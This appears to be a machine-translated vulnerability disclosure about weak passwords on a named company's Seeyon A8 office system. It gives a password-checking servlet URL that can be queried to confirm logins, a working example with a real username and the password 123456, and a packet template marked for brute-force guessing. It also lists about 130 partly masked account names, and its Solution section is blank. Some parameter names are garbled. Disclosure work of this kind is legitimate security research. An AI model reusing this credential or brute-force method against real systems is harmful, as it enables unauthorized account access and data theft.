58. A home system has a large number of weak passwords
Detailed description:
Reference WooYun: Zhiyuan A8-V5 arbitrary User Password Modification Vulnerability
Http://oa.daojia.58.com//seeyon/getAjaxDataServlet? S = ajaxOrgManager & M = isOldPasswordCorrect & CL = true & RVT = XML & p_0000string = xxxuser & P_2_String = xxxpwd
Returns true if the user name and password are correct.
Otherwise, false is returned.
For example
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456
Logon successful
Packet Capture
GET //seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=§xxxuser§&P_2_String=§xxxpwd§ HTTP/1.1Host: oa.daojia.58.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: Connection: keep-alive
Use Address Book as username 123456 as Password
More than one hundred and thirty
Manually create a mask
wa***enzh***ngwa***uizo***ngzh***ngta***yiwa***anzh***ngdu***eica***bogu***yidi***anch***ngda***lidu***aodu***ngfa***uiha***aohu***anhu***dili***eili***ngli***ngli***heli***inlu***ngpe***xuta***ngwa***ngwe***ngwu***ngxu***iaya***aoya***enya***ngyi***ngzh***unzh***zizh***ngzh***ngzh***anch***eizh***iase***n2zh***anzh***ngli***aoge***yudu***enzh***anca***anni***infa***uoga***aoya***diwu***xuqu***uiye***ngma***ngsu***ngli***unlv***ngwa***eizh***huzh***yuge***yuyi***ngma***lili***anzh***angu***enbu***uezh***yixi***unou***lidu***inlu***ngdi***liya***liso***ngzh***anso***anji***ngwa***anso***iaba***naho***eicu***ngca***uawa***unwa***yupa***anhu***yuhu***yawe***yuyu***anma***aoca***ueme***enzh***ngli***eili***qihu***enji***anlu***nggu***eide***yure***anre***ngwe***ngxi***ngyu***uisu***unya***nazh***ngti***gehu***qizh***ngdu***anxu***uiya***eini***aohu***nglu***uita***yuji***ngli***humi***suli***iafe***inwu***unca***ngso***anfa***aozh***nglu***aoyu***bohe***lewa***in
Proof of vulnerability:
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456
How to Use mask labels
Solution: